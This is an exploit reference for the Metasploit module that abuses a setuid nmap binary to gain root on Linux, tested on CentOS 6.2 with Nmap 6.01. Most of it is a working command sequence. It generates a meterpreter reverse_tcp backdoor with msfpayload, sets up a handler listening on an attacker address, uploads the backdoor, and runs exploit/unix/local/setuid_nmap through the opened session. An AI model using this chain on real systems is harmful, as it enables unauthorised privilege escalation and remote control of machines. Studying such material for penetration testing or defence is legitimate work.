Timeline :

Metasploit PoC provided the 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You will require to have an active session on the target, this session could be done  through a backdoor.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid